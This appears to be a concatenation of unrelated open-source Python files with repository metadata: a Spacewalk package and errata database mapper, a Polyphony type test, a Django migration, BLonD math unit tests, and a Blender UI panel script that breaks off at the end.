provided mapper.
"""
package_id = str(package_id)
last_modified = str(self.mapper.last_modified(package_id))
last_modified = last_modified.replace(" ", "")
last_modified = last_modified.replace(":", "")
last_modified = last_modified.replace("-", "")
cache_key = "repomd-packages/" + package_id
if self.cache.has_key(cache_key, last_modified):
package = self.cache.get(cache_key)
else:
package = self.mapper.get_package(package_id)
self.cache.set(cache_key, package, last_modified)
return package
class SqlPackageMapper:
""" Data Mapper for Packages to the RHN db. """
def __init__(self):
self.details_sql = rhnSQL.prepare("""
select
pn.name,
pevr.version,
pevr.release,
pevr.epoch,
pa.label arch,
c.checksum checksum,
p.summary,
p.description,
p.vendor,
p.build_time,
p.package_size,
p.payload_size,
p.installed_size,
p.header_start,
p.header_end,
pg.name package_group,
p.build_host,
p.copyright,
p.path,
sr.name source_rpm,
p.last_modified,
c.checksum_type
from
rhnPackage p,
rhnPackageName pn,
rhnPackageEVR pevr,
rhnPackageArch pa,
rhnPackageGroup pg,
rhnSourceRPM sr,
rhnChecksumView c
where
p.id = :package_id
and p.name_id = pn.id
and p.evr_id = pevr.id
and p.package_arch_id = pa.id
and p.package_group = pg.id
and p.source_rpm_id = sr.id
and p.checksum_id = c.id
""")
self.filelist_sql = rhnSQL.prepare("""
select
pc.name
from
rhnPackageCapability pc,
rhnPackageFile pf
where
pf.package_id = :package_id
and pf.capability_id = pc.id
""")
self.prco_sql = rhnSQL.prepare("""
select
'provides',
pp.sense,
pc.name,
pc.version
from
rhnPackageCapability pc,
rhnPackageProvides pp
where
pp.package_id = :package_id
and pp.capability_id = pc.id
union all
select
'requires',
pr.sense,
pc.name,
pc.version
from
rhnPackageCapability pc,
rhnPackageRequires pr
where
pr.package_id = :package_id
and pr.capability_id = pc.id
union all
select
'recommends',
prec.sense,
pc.name,
pc.version
from
rhnPackageCapability pc,
rhnPackageRecommends prec
where
prec.package_id = :package_id
and prec.capability_id = pc.id
union all
select
'supplements',
supp.sense,
pc.name,
pc.version
from
rhnPackageCapability pc,
rhnPackageSupplements supp
where
supp.package_id = :package_id
and supp.capability_id = pc.id
union all
select
'enhances',
enh.sense,
pc.name,
pc.version
from
rhnPackageCapability pc,
rhnPackageEnhances enh
where
enh.package_id = :package_id
and enh.capability_id = pc.id
union all
select
'suggests',
sugg.sense,
pc.name,
pc.version
from
rhnPackageCapability pc,
rhnPackageSuggests sugg
where
sugg.package_id = :package_id
and sugg.capability_id = pc.id
union all
select
'conflicts',
pcon.sense,
pc.name,
pc.version
from
rhnPackageCapability pc,
rhnPackageConflicts pcon
where
pcon.package_id = :package_id
and pcon.capability_id = pc.id
union all
select
'obsoletes',
po.sense,
pc.name,
pc.version
from
rhnPackageCapability pc,
rhnPackageObsoletes po
where
po.package_id = :package_id
and po.capability_id = pc.id
union all
select
'breaks',
brks.sense,
pc.name,
pc.version
from
rhnPackageCapability pc,
rhnPackageBreaks brks
where
brks.package_id = :package_id
and brks.capability_id = pc.id
union all
select
'predepends',
pdep.sense,
pc.name,
pc.version
from
rhnPackageCapability pc,
rhnPackagePredepends pdep
where
pdep.package_id = :package_id
and pdep.capability_id = pc.id
""")
self.last_modified_sql = rhnSQL.prepare("""
select
to_char(last_modified, 'YYYYMMDDHH24MISS') as last_modified
from
rhnPackage
where id = :package_id
""")
self.other_sql = rhnSQL.prepare("""
select
name,
text,
time
from
rhnPackageChangelog
where package_id = :package_id
""")
def last_modified(self, package_id):
""" Get the last_modified date on the package with id package_id. """
self.last_modified_sql.execute(package_id = package_id)
return self.last_modified_sql.fetchone()[0]
def get_package(self, package_id):
""" Get the package with id package_id from the RHN db. """
package = domain.Package(package_id)
self._fill_package_details(package)
self._fill_package_prco(package)
self._fill_package_filelist(package)
self._fill_package_other(package)
return package
def _get_package_filename(self, pkg):
if pkg[18]:
path = pkg[18]
return os.path.basename(path)
else:
name = pkg[0]
version = pkg[1]
release = pkg[2]
arch = pkg[4]
return "%s-%s-%s.%s.rpm" % (name, version, release, arch)
def _fill_package_details(self, package):
""" Load the packages basic details (summary, description, etc). """
self.details_sql.execute(package_id = package.id)
pkg = self.details_sql.fetchone()
package.name = pkg[0]
package.version = pkg[1]
package.release = pkg[2]
if pkg[3] != None:
package.epoch = pkg[3]
package.arch = pkg[4]
package.checksum_type = pkg[21]
package.checksum = pkg[5]
package.summary = string_to_unicode(pkg[6])
package.description = string_to_unicode(pkg[7])
package.vendor = string_to_unicode(pkg[8])
package.build_time = oratimestamp_to_sinceepoch(pkg[9])
package.package_size = pkg[10]
package.payload_size = pkg[11]
package.installed_size = pkg[12]
package.header_start = pkg[13]
package.header_end = pkg[14]
package.package_group = pkg[15]
package.build_host = pkg[16]
package.copyright = string_to_unicode(pkg[17])
package.filename = self._get_package_filename(pkg)
package.source_rpm = pkg[19]
def _fill_package_prco(self, package):
""" Load the package's provides, requires, conflicts, obsoletes. """
self.prco_sql.execute(package_id = package.id)
deps = self.prco_sql.fetchall() or []
for item in deps:
version = item[3] or ""
relation = ""
release = None
epoch = 0
if version:
sense = item[1] or 0
relation = SqlPackageMapper.__get_relation(sense)
vertup = version.split('-')
if len(vertup) > 1:
version = vertup[0]
release = vertup[1]
vertup = version.split(':')
if len(vertup) > 1:
epoch = vertup[0]
version = vertup[1]
dep = {'name' : string_to_unicode(item[2]), 'flag' : relation,
'version' : version, 'release' : release, 'epoch' : epoch}
if item[0] == "provides":
package.provides.append(dep)
elif item[0] == "requires":
package.requires.append(dep)
elif item[0] == "conflicts":
package.conflicts.append(dep)
elif item[0] == "obsoletes":
package.obsoletes.append(dep)
elif item[0] == "recommends":
package.recommends.append(dep)
elif item[0] == "supplements":
package.supplements.append(dep)
elif item[0] == "enhances":
package.enhances.append(dep)
elif item[0] == "suggests":
package.suggests.append(dep)
elif item[0] == "breaks":
package.breaks.append(dep)
elif item[0] == "predepends":
package.predepends.append(dep)
else:
assert False, "Unknown PRCO type: %s" % item[0]
# @staticmethod
def __get_relation(sense):
""" Convert the binary sense into a string. """
        # Mask off everything but the low comparison bits
sense = sense & 0xf
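        # Example: sense 10 sets both the LT (2) and EQ (8) bits, so it maps
        # to "LE"; likewise 12 (GT | EQ) maps to "GE".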
if sense == 2:
relation = "LT"
elif sense == 4:
relation = "GT"
elif sense == 8:
relation = "EQ"
elif sense == 10:
relation = "LE"
elif sense == 12:
relation = "GE"
else:
assert False, "Unknown relation sense: %s" % sense
return relation
__get_relation = staticmethod(__get_relation)
def _fill_package_filelist(self, package):
""" Load the package's list of files. """
self.filelist_sql.execute(package_id = package.id)
files = self.filelist_sql.fetchall() or []
for file_dict in files:
package.files.append(string_to_unicode(file_dict[0]))
def _fill_package_other(self, package):
""" Load the package's changelog info. """
self.other_sql.execute(package_id = package.id)
log_data = self.other_sql.fetchall() or []
for data in log_data:
date = oratimestamp_to_sinceepoch(data[2])
chglog = {'author' : string_to_unicode(data[0]), 'date' : date,
'text' : string_to_unicode(data[1])}
package.changelog.append(chglog)
class CachedErratumMapper:
""" Data Mapper for Errata to an on-disc cache. """
def __init__(self, mapper, package_mapper):
self.package_mapper = package_mapper
cache = rhnCache.Cache()
cache = rhnCache.ObjectCache(cache)
self.cache = rhnCache.NullCache(cache)
self.mapper = mapper
def get_erratum(self, erratum_id):
"""
Load the erratum with id erratum_id.
Load from the cache, if it is new enough. If not, fall back to the
provided mapper.
"""
erratum_id = str(erratum_id)
last_modified = str(self.mapper.last_modified(erratum_id))
last_modified = re.sub(" ", "", last_modified)
last_modified = re.sub(":", "", last_modified)
last_modified = re.sub("-", "", last_modified)
cache_key = "repomd-errata/" + erratum_id
if self.cache.has_key(cache_key, last_modified):
erratum = self.cache.get(cache_key)
for package_id in erratum.package_ids:
package = self.package_mapper.get_package(package_id)
erratum.packages.append(package)
else:
erratum = self.mapper.get_erratum(erratum_id)
tmp_packages = erratum.packages
erratum.packages = []
self.cache.set(cache_key, erratum, last_modified)
erratum.packages = tmp_packages
return erratum
class SqlErratumMapper:
def __init__(self, package_mapper):
self.package_mapper = package_mapper
self.last_modified_sql = rhnSQL.prepare("""
select
to_char(last_modified, 'YYYYMMDDHH24MISS') as last_modified
from
rhnErrata
where id = :erratum_id
""")
self.erratum_details_sql = rhnSQL.prepare("""
select
advisory,
advisory_name,
advisory_type,
advisory_rel,
description,
synopsis,
TO_CHAR(issue_date, 'YYYY-MM-DD HH24:MI:SS') AS issue_date,
TO_CHAR(update_date, 'YYYY-MM-DD HH24:MI:SS') AS update_date
from
rhnErrata
where
id = :erratum_id
""")
self.erratum_cves_sql = rhnSQL.prepare("""
select
cve.name as cve_name
from
rhnCVE cve,
rhnErrataCVE ec
where
ec.errata_id = :erratum_id
and ec.cve_id = cve.id
""")
self.erratum_bzs_sql = rhnSQL.prepare("""
select
bug_id,
summary,
href
from
rhnErrataBuglist
where
errata_id = :erratum_id
""")
self.erratum_packages_sql = rhnSQL.prepare("""
select
package_id
from
rhnErrataPackage
where
errata_id = :erratum_id
""")
def last_modified(self, erratum_id):
""" Get the last_modified field for the provided erratum_id. """
self.last_modified_sql.execute(erratum_id = erratum_id)
return self.last_modified_sql.fetchone()[0]
def get_erratum(self, erratum_id):
""" Get the package with id package_id from the RHN db. """
erratum = domain.Erratum(erratum_id)
self._fill_erratum_details(erratum)
# TODO: These two don't work on satellites.
# We must not install the tables there
self._fill_erratum_bz_references(erratum)
self._fill_erratum_cve_references(erratum)
self._fill_erratum_packages(erratum)
return erratum
def _fill_erratum_details(self, erratum):
self.erratum_details_sql.execute(erratum_id = erratum.id)
ertm = self.erratum_details_sql.fetchone()
erratum.readable_id = ertm[0]
erratum.title = ertm[1]
if ertm[2] == 'Security Advisory':
erratum.advisory_type = 'security'
elif ertm[2] == 'Bug Fix Advisory':
erratum.advisory_type = 'bugfix'
elif ertm[2] == 'Product Enhancement Advisory':
erratum.advisory_type = 'enhancement'
else:
erratum.advisory_type = 'errata'
erratum.version = ertm[3]
erratum.description = ertm[4]
erratum.synopsis = ertm[5]
erratum.issued = ertm[6]
erratum.updated = ertm[7]
def _fill_erratum_bz_references(self, erratum):
self.erratum_bzs_sql.execute(erratum_id = erratum.id)
bz_refs = self.erratum_bzs_sql.fetchall_dict()
if bz_refs:
erratum.bz_references = bz_refs
def _fill_erratum_cve_references(self, erratum):
self.erratum_cves_sql.execute(erratum_id = erratum.id)
cve_refs = self.erratum_cves_sql.fetchall()
for cve_ref in cve_refs:
erratum.cve_references.append(cve_ref[0])
def _fill_erratum_packages(self, erratum):
self.erratum_packages_sql.execute(erratum_id = erratum.id)
pkgs = self.erratum_packages_sql.fetchall()
for pkg in pkgs:
package = self.package_mapper.get_package(pkg[0])
erratum.packages.append(package)
erratum.package_ids.append(pkg[0])
class SqlCompsMapper:
def __init__(self):
self.comps_sql = rhnSQL.prepare("""
select
relative_filename
from
rhnChannelComps
where
id = :comps_id
""")
def get_comps(self, comps_id):
self.comps_sql.execute(comps_id = comps_id)
comps_row = self.comps_sql.fetchone()
filename = os.path.join(CFG.mount_point, comps_row[0])
return domain.Comps(comps_id, filename)
def get_channel_mapper():
""" Factory Method-ish function to load a Channel Mapper. """
package_mapper = get_package_mapper()
erratum_mapper = get_erratum_mapper(package_mapper)
comps_mapper = SqlCompsMapper()
channel_mapper = ChannelMapper(package_mapper, erratum_mapper, comps_mapper)
return channel_mapper
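# Illustrative usage sketch (assumes the caller has already initialized the
# database layer, e.g. via rhnSQL.initDB(), which this module does not do):
#
#   channel_mapper = get_channel_mapper()
#   channel = channel_mapper.get_channel(channel_id)
#   for package in channel.packages:
#       ...  # packages are yielded lazily by _package_generator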
def get_package_mapper():
""" Factory Method-ish function to load a Package Mapper. """
package_mapper = SqlPackageMapper()
package_mapper = CachedPackageMapper(package_mapper)
return package_mapper
def get_erratum_mapper(package_mapper):
""" Factory Method-ish function to load an Erratum Mapper. """
erratum_mapper = SqlErratumMapper(package_mapper)
erratum_mapper = CachedErratumMapper(erratum_mapper, package_mapper)
return erratum_mapper
def oratimestamp_to_sinceepoch(ts):
return time.mktime((ts.year, ts.month, ts.day, ts.hour, ts.minute,
ts.second, 0, 0, -1))
def string_to_unicode(text):
if text is None:
return ''
if isinstance(text, unicode):
return text
#First try a bunch of encodings in strict mode
encodings = ['ascii', 'iso-8859-1', 'iso-8859-15', 'iso-8859-2']
for encoding in encodings:
try:
dec = text.decode(encoding)
enc = dec.encode('utf-8')
return enc
except UnicodeError:
continue
# None of those worked, just do ascii with replace
    dec = text.decode('ascii', 'replace')
enc = dec.encode('utf-8', 'replace')
return enc
| moio/spacewalk | backend/server/repomd/mapper.py | Python | gpl-2.0 | 23,045 |
from polyphony import testbench
def f(a):
return a
def int_f(a):
b = 3
c = f(b)
if c == 3:
return a
else:
return b
def bool_f(a):
b = (3 == 4)
c = f(b)
    if c:
return a
else:
return a + 3
def ib_f(a):
if a == 1:
return int_f(a)
else:
return bool_f(a)
@testbench
def test():
#r = int_f(3) #ok
#r = bool_f(1) #ok
r = ib_f(1)
print(r)
test()
| ryos36/polyphony-tutorial | malicious/type_test.py | Python | mit | 452 |
# -*- coding: utf-8 -*-
# Generated by Django 1.9.4 on 2016-05-08 21:15
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('cms', '0002_auto_20160508_1908'),
]
operations = [
migrations.AlterField(
model_name='post',
name='featured_photo',
field=models.ImageField(upload_to='/products'),
),
]
| porimol/django-blog | cms/migrations/0003_auto_20160508_2115.py | Python | mit | 461 |
# coding: utf8
# Copyright 2014-2017 CERN. This software is distributed under the
# terms of the GNU General Public Licence version 3 (GPL Version 3),
# copied verbatim in the file LICENCE.md.
# In applying this licence, CERN does not waive the privileges and immunities
# granted to it by virtue of its status as an Intergovernmental Organization or
# submit itself to any jurisdiction.
# Project website: http://blond.web.cern.ch/
"""
Unittest for utils.bmath
:Authors: **Konstantinos Iliakis**
"""
import unittest
import numpy as np
# import inspect
from blond.utils import bmath as bm
class TestFastResonator(unittest.TestCase):
# Run before every test
def setUp(self):
np.random.seed(0)
pass
# Run after every test
def tearDown(self):
pass
def test_fast_resonator_py_V_C_1(self):
n_resonators = 5
size = 10
decimal = 14
freq_a = np.random.randn(size)
R_S = np.random.randn(n_resonators)
Q = np.random.randn(n_resonators)
freq_R = np.random.randn(n_resonators)
impedance_py = np.zeros(len(freq_a), complex)
for i in range(0, n_resonators):
impedance_py[1:] += R_S[i] / (1 + 1j * Q[i] *
(freq_a[1:] / freq_R[i] -
freq_R[i] / freq_a[1:]))
impedance_c = bm.fast_resonator(R_S, Q, freq_a, freq_R)
np.testing.assert_almost_equal(
impedance_py, impedance_c, decimal=decimal)
def test_fast_resonator_py_V_C_2(self):
n_resonators = 5
size = 1000
decimal = 14
freq_a = np.random.randn(size)
R_S = np.random.randn(n_resonators)
Q = np.random.randn(n_resonators)
freq_R = np.random.randn(n_resonators)
impedance_py = np.zeros(len(freq_a), complex)
for i in range(0, n_resonators):
impedance_py[1:] += R_S[i] / (1 + 1j * Q[i] *
(freq_a[1:] / freq_R[i] -
freq_R[i] / freq_a[1:]))
impedance_c = bm.fast_resonator(R_S, Q, freq_a, freq_R)
np.testing.assert_almost_equal(
impedance_py, impedance_c, decimal=decimal)
def test_fast_resonator_py_V_C_3(self):
n_resonators = 20
size = 1000
decimal = 14
freq_a = np.random.randn(size)
R_S = np.random.randn(n_resonators)
Q = np.random.randn(n_resonators)
freq_R = np.random.randn(n_resonators)
impedance_py = np.zeros(len(freq_a), complex)
for i in range(0, n_resonators):
impedance_py[1:] += R_S[i] / (1 + 1j * Q[i] *
(freq_a[1:] / freq_R[i] -
freq_R[i] / freq_a[1:]))
impedance_c = bm.fast_resonator(R_S, Q, freq_a, freq_R)
np.testing.assert_almost_equal(
impedance_py, impedance_c, decimal=decimal)
def test_fast_resonator_py2_V_C_4(self):
n_resonators = 20
size = 1000
decimal = 14
freq_a = np.random.randn(size)
R_S = np.random.randn(n_resonators)
Q = np.random.randn(n_resonators)
freq_R = np.random.randn(n_resonators)
impedance_py = np.zeros(len(freq_a), complex)
for res in range(0, n_resonators):
Qsquare = Q[res] * Q[res]
for freq in range(1, len(freq_a)):
commonTerm = (freq_a[freq] / freq_R[res]
- freq_R[res]/freq_a[freq])
impedance_py.real[freq] += R_S[res] \
/ (1. + Qsquare * commonTerm * commonTerm)
impedance_py.imag[freq] -= R_S[res] * (Q[res] * commonTerm) \
/ (1. + Qsquare * commonTerm * commonTerm)
# impedance_py[1:] += R_S[i] / (1 + 1j * Q[i] *
# (freq_a[1:] / freq_R[i] -
# freq_R[i] / freq_a[1:]))
impedance_c = bm.fast_resonator(R_S, Q, freq_a, freq_R)
np.testing.assert_almost_equal(
impedance_py, impedance_c, decimal=decimal)
def test_fast_resonator_py_V_C_5(self):
n_resonators = 100
size = 100000
decimal = 14
freq_a = np.random.randn(size)
R_S = np.random.randn(n_resonators)
Q = np.random.randn(n_resonators)
freq_R = np.random.randn(n_resonators)
impedance_py = np.zeros(len(freq_a), complex)
for i in range(0, n_resonators):
impedance_py[1:] += R_S[i] / (1 + 1j * Q[i] *
(freq_a[1:] / freq_R[i] -
freq_R[i] / freq_a[1:]))
impedance_c = bm.fast_resonator(R_S, Q, freq_a, freq_R)
np.testing.assert_almost_equal(
impedance_py, impedance_c, decimal=decimal)
def test_fast_resonator_py_V_py_1(self):
n_resonators = 20
size = 1000
decimal = 14
freq_a = np.random.randn(size)
R_S = np.random.randn(n_resonators)
Q = np.random.randn(n_resonators)
freq_R = np.random.randn(n_resonators)
impedance_py1 = np.zeros(len(freq_a), complex)
impedance_py2 = np.zeros(len(freq_a), complex)
for res in range(0, n_resonators):
Qsquare = Q[res] * Q[res]
for freq in range(1, len(freq_a)):
commonTerm = (freq_a[freq] / freq_R[res]
- freq_R[res]/freq_a[freq])
impedance_py1.real[freq] += R_S[res] \
/ (1. + Qsquare * commonTerm * commonTerm)
impedance_py1.imag[freq] -= R_S[res] * (Q[res] * commonTerm) \
/ (1. + Qsquare * commonTerm * commonTerm)
for i in range(n_resonators):
impedance_py2[1:] += R_S[i] / (1 + 1j * Q[i]
* (freq_a[1:] / freq_R[i]
- freq_R[i] / freq_a[1:]))
np.testing.assert_almost_equal(
impedance_py1, impedance_py2, decimal=decimal)
class TestWhere(unittest.TestCase):
# Run before every test
def setUp(self):
np.random.seed(0)
pass
# Run after every test
def tearDown(self):
pass
def test_where_1(self):
a = np.random.randn(100)
less_than = np.random.rand()
real = np.where(a < less_than)[0]
testing = np.nonzero(bm.where(a, less_than=less_than))[0]
np.testing.assert_equal(real, testing)
def test_where_2(self):
a = np.random.randn(100)
more_than = np.random.rand()
real = np.where(a > more_than)[0]
testing = np.nonzero(bm.where(a, more_than=more_than))[0]
np.testing.assert_equal(real, testing)
def test_where_3(self):
a = np.random.randn(100)
less_than = np.random.rand()
more_than = np.random.rand()
real = np.where(np.logical_and(a < less_than, a > more_than))[0]
testing = np.nonzero(bm.where(a, less_than=less_than, more_than=more_than))[0]
np.testing.assert_equal(real, testing)
def test_where_4(self):
a = np.random.randn(100)
less_than = np.random.rand()
more_than = less_than
real = np.where(np.logical_and(a < less_than, a > more_than))[0]
testing = np.nonzero(bm.where(a, less_than=less_than, more_than=more_than))[0]
np.testing.assert_equal(real, testing)
def test_where_5(self):
a = np.random.randn(100)
less_than = 0
more_than = 1
real = np.where(np.logical_and(a < less_than, a > more_than))[0]
testing = np.nonzero(bm.where(a, less_than=less_than, more_than=more_than))[0]
np.testing.assert_equal(real, testing)
def test_where_6(self):
a = np.arange(100).reshape(10,10)
testing = bm.where(a, less_than=0)
np.testing.assert_equal(a.shape, testing.shape, err_msg='Shapes do not match.')
def test_where_7(self):
        a = np.arange(9, dtype=float).reshape(3, 3)
threshold = 4
real = a < threshold
testing = bm.where(a, less_than=threshold)
np.testing.assert_equal(real, testing)
class TestSin(unittest.TestCase):
# Run before every test
def setUp(self):
pass
# Run after every test
def tearDown(self):
pass
def test_sin_scalar_1(self):
a = np.random.rand()
np.testing.assert_almost_equal(bm.sin(a), np.sin(a), decimal=8)
def test_sin_scalar_2(self):
np.testing.assert_almost_equal(
bm.sin(-np.pi), np.sin(-np.pi), decimal=8)
def test_sin_vector_1(self):
a = np.random.randn(100)
np.testing.assert_almost_equal(bm.sin(a), np.sin(a), decimal=8)
class TestCos(unittest.TestCase):
# Run before every test
def setUp(self):
pass
# Run after every test
def tearDown(self):
pass
def test_cos_scalar_1(self):
a = np.random.rand()
np.testing.assert_almost_equal(bm.cos(a), np.cos(a), decimal=8)
def test_cos_scalar_2(self):
np.testing.assert_almost_equal(
bm.cos(-2*np.pi), np.cos(-2*np.pi), decimal=8)
def test_cos_vector_1(self):
a = np.random.randn(100)
np.testing.assert_almost_equal(bm.cos(a), np.cos(a), decimal=8)
class TestExp(unittest.TestCase):
# Run before every test
def setUp(self):
pass
# Run after every test
def tearDown(self):
pass
def test_exp_scalar_1(self):
a = np.random.rand()
np.testing.assert_almost_equal(bm.exp(a), np.exp(a), decimal=8)
def test_exp_vector_1(self):
a = np.random.randn(100)
np.testing.assert_almost_equal(bm.exp(a), np.exp(a), decimal=8)
class TestMean(unittest.TestCase):
# Run before every test
def setUp(self):
pass
# Run after every test
def tearDown(self):
pass
def test_mean_1(self):
a = np.random.randn(100)
np.testing.assert_almost_equal(bm.mean(a), np.mean(a), decimal=8)
def test_mean_2(self):
a = np.random.randn(1)
np.testing.assert_almost_equal(bm.mean(a), np.mean(a), decimal=8)
class TestStd(unittest.TestCase):
# Run before every test
def setUp(self):
pass
# Run after every test
def tearDown(self):
pass
def test_std_1(self):
a = np.random.randn(100)
np.testing.assert_almost_equal(bm.std(a), np.std(a), decimal=8)
def test_std_2(self):
a = np.random.randn(1)
np.testing.assert_almost_equal(bm.std(a), np.std(a), decimal=8)
class TestSum(unittest.TestCase):
# Run before every test
def setUp(self):
pass
# Run after every test
def tearDown(self):
pass
def test_sum_1(self):
a = np.random.randn(100)
np.testing.assert_almost_equal(bm.sum(a), np.sum(a), decimal=8)
def test_sum_2(self):
a = np.random.randn(1)
np.testing.assert_almost_equal(bm.sum(a), np.sum(a), decimal=8)
class TestLinspace(unittest.TestCase):
# Run before every test
def setUp(self):
pass
# Run after every test
def tearDown(self):
pass
def test_linspace_1(self):
start = 0.
stop = 10.
num = 33
np.testing.assert_almost_equal(bm.linspace(start, stop, num),
np.linspace(start, stop, num), decimal=8)
def test_linspace_2(self):
start = 0
stop = 10
num = 33
np.testing.assert_almost_equal(bm.linspace(start, stop, num),
np.linspace(start, stop, num), decimal=8)
def test_linspace_3(self):
start = 12.234
stop = -10.456
np.testing.assert_almost_equal(bm.linspace(start, stop),
np.linspace(start, stop), decimal=8)
def test_linspace_4(self):
start = np.random.rand()
stop = np.random.rand()
num = int(np.random.rand())
np.testing.assert_almost_equal(bm.linspace(start, stop, num),
np.linspace(start, stop, num), decimal=8)
class TestArange(unittest.TestCase):
# Run before every test
def setUp(self):
pass
# Run after every test
def tearDown(self):
pass
def test_arange_1(self):
start = 0.
stop = 1000.
step = 33
np.testing.assert_almost_equal(bm.arange(start, stop, step),
np.arange(start, stop, step), decimal=8)
def test_arange_2(self):
start = 0
stop = 1000
step = 33
np.testing.assert_almost_equal(bm.arange(start, stop, step),
np.arange(start, stop, step), decimal=8)
def test_arange_3(self):
start = 12.234
stop = -10.456
step = -0.067
np.testing.assert_almost_equal(bm.arange(start, stop, step),
np.arange(start, stop, step), decimal=8)
def test_arange_4(self):
start = np.random.rand()
stop = np.random.rand()
start, stop = min(start, stop), max(start, stop)
step = np.random.random() * (stop - start) / 60.
np.testing.assert_almost_equal(bm.arange(start, stop, step),
np.arange(start, stop, step), decimal=8)
class TestArgMin(unittest.TestCase):
# Run before every test
def setUp(self):
pass
# Run after every test
def tearDown(self):
pass
def test_min_idx_1(self):
a = np.random.randn(100)
np.testing.assert_equal(bm.argmin(a), np.argmin(a))
def test_min_idx_2(self):
a = np.random.randn(1000)
np.testing.assert_equal(bm.argmin(a), np.argmin(a))
class TestArgMax(unittest.TestCase):
# Run before every test
def setUp(self):
pass
# Run after every test
def tearDown(self):
pass
def test_max_idx_1(self):
a = np.random.randn(100)
np.testing.assert_equal(bm.argmax(a), np.argmax(a))
def test_max_idx_2(self):
a = np.random.randn(1000)
np.testing.assert_equal(bm.argmax(a), np.argmax(a))
class TestConvolve(unittest.TestCase):
# Run before every test
def setUp(self):
pass
# Run after every test
def tearDown(self):
pass
def test_convolve_1(self):
s = np.random.randn(100)
k = np.random.randn(100)
np.testing.assert_almost_equal(bm.convolve(s, k, mode='full'),
np.convolve(s, k, mode='full'),
decimal=8)
def test_convolve_2(self):
s = np.random.randn(200)
k = np.random.randn(200)
with self.assertRaises(RuntimeError):
            bm.convolve(s, k, mode='same')
with self.assertRaises(RuntimeError):
bm.convolve(s, k, mode='valid')
class TestInterp(unittest.TestCase):
# Run before every test
def setUp(self):
pass
# Run after every test
def tearDown(self):
pass
def test_interp_1(self):
x = np.random.randn(100)
xp = np.random.randn(100)
xp.sort()
yp = np.random.randn(100)
np.testing.assert_almost_equal(bm.interp(x, xp, yp),
np.interp(x, xp, yp), decimal=8)
def test_interp_2(self):
x = np.random.randn(200)
x.sort()
xp = np.random.randn(50)
xp.sort()
yp = np.random.randn(50)
np.testing.assert_almost_equal(bm.interp(x, xp, yp),
np.interp(x, xp, yp), decimal=8)
def test_interp_3(self):
x = np.random.randn(1)
xp = np.random.randn(50)
xp.sort()
yp = np.random.randn(50)
np.testing.assert_almost_equal(bm.interp(x, xp, yp),
np.interp(x, xp, yp), decimal=8)
def test_interp_4(self):
x = np.random.randn(1)
xp = np.random.randn(50)
xp.sort()
yp = np.random.randn(50)
np.testing.assert_almost_equal(bm.interp(x, xp, yp, 0., 1.),
np.interp(x, xp, yp, 0., 1.), decimal=8)
class TestTrapz(unittest.TestCase):
# Run before every test
def setUp(self):
pass
# Run after every test
def tearDown(self):
pass
def test_trapz_1(self):
y = np.random.randn(100)
np.testing.assert_almost_equal(bm.trapz(y), np.trapz(y), decimal=8)
def test_trapz_2(self):
y = np.random.randn(100)
x = np.random.rand(100)
np.testing.assert_almost_equal(bm.trapz(y, x=x),
np.trapz(y, x=x), decimal=8)
def test_trapz_3(self):
y = np.random.randn(100)
np.testing.assert_almost_equal(bm.trapz(y, dx=0.1),
np.trapz(y, dx=0.1), decimal=8)
class TestCumTrapz(unittest.TestCase):
# Run before every test
def setUp(self):
pass
# Run after every test
def tearDown(self):
pass
def test_cumtrapz_1(self):
import scipy.integrate
y = np.random.randn(100)
initial = np.random.rand()
np.testing.assert_almost_equal(bm.cumtrapz(y, initial=initial),
scipy.integrate.cumtrapz(
y, initial=initial),
decimal=8)
def test_cumtrapz_2(self):
import scipy.integrate
y = np.random.randn(100)
np.testing.assert_almost_equal(bm.cumtrapz(y),
scipy.integrate.cumtrapz(y),
decimal=8)
def test_cumtrapz_3(self):
import scipy.integrate
y = np.random.randn(100)
dx = np.random.rand()
np.testing.assert_almost_equal(bm.cumtrapz(y, dx=dx),
scipy.integrate.cumtrapz(y, dx=dx),
decimal=8)
def test_cumtrapz_4(self):
import scipy.integrate
y = np.random.randn(100)
dx = np.random.rand()
initial = np.random.rand()
np.testing.assert_almost_equal(bm.cumtrapz(y, initial=initial, dx=dx),
scipy.integrate.cumtrapz(
y, initial=initial, dx=dx),
decimal=8)
class TestSort(unittest.TestCase):
# Run before every test
def setUp(self):
pass
# Run after every test
def tearDown(self):
pass
def test_sort_1(self):
y = np.random.randn(100)
y2 = np.copy(y)
y2.sort()
np.testing.assert_equal(bm.sort(y), y2)
def test_sort_2(self):
y = np.random.randn(200)
y2 = np.copy(y)
np.testing.assert_equal(bm.sort(y, reverse=True),
sorted(y2, reverse=True))
def test_sort_3(self):
y = np.random.randn(200)
y2 = np.copy(y)
bm.sort(y)
y2.sort()
np.testing.assert_equal(y, y2)
bm.sort(y, reverse=True)
y2 = sorted(y2, reverse=True)
np.testing.assert_equal(y, y2)
def test_sort_4(self):
y = np.array([np.random.randint(100)
for i in range(100)], dtype=np.int32)
y2 = np.copy(y)
bm.sort(y)
y2.sort()
np.testing.assert_equal(y, y2)
bm.sort(y, reverse=True)
y2 = sorted(y2, reverse=True)
np.testing.assert_equal(y, y2)
def test_sort_5(self):
y = np.array([np.random.randint(100)
for i in range(100)], dtype=int)
y2 = np.copy(y)
bm.sort(y)
y2.sort()
np.testing.assert_equal(y, y2)
bm.sort(y, reverse=True)
y2 = sorted(y2, reverse=True)
np.testing.assert_equal(y, y2)
if __name__ == '__main__':
unittest.main()
| blond-admin/BLonD | unittests/utils/test_blondmath.py | Python | gpl-3.0 | 20,919 |
import bpy
import mathutils
class SphereTrackCoordinates(bpy.types.Panel):
"""A Custom Panel in the Viewport Toolbar"""
bl_label = "SphereTrackCoordinates"
bl_space_type = 'VIEW_3D'
bl_region_type = 'TOOLS'
    def draw(self, context):
        layout = self.layout
        # Look up the sphere on every redraw so the panel tracks the
        # object's current location instead of the location captured once
        # at import time.
        sphere = bpy.data.objects.get("Sphere")
        if sphere is None:
            layout.row().label(text="No object named 'Sphere'")
            return
        loc = sphere.location
        row = layout.row()
        row.label(text="Sphere Coordinates")
        row = layout.row()
        row.label(text="X-Coordinate")
        row = layout.row()
        row.label(text=str(loc.x))
        row = layout.row()
        row.label(text="Y-Coordinate")
        row = layout.row()
        row.label(text=str(loc.y))
        row = layout.row()
        row.label(text="Z-Coordinate")
        row = layout.row()
        row.label(text=str(loc.z))
split = layout.split()
col = split.column(align=True)
#col.operator("mesh.primitive_plane_add", text="Plane", icon='MESH_PLANE')
#col.operator("mesh.primitive_torus_add", text="Torus", icon='MESH_TORUS')
def register():
bpy.utils.register_class(SphereTrackCoordinates)
def unregister():
bpy.utils.unregister_class(SphereTrackCoordinates)
if __name__ == "__main__":
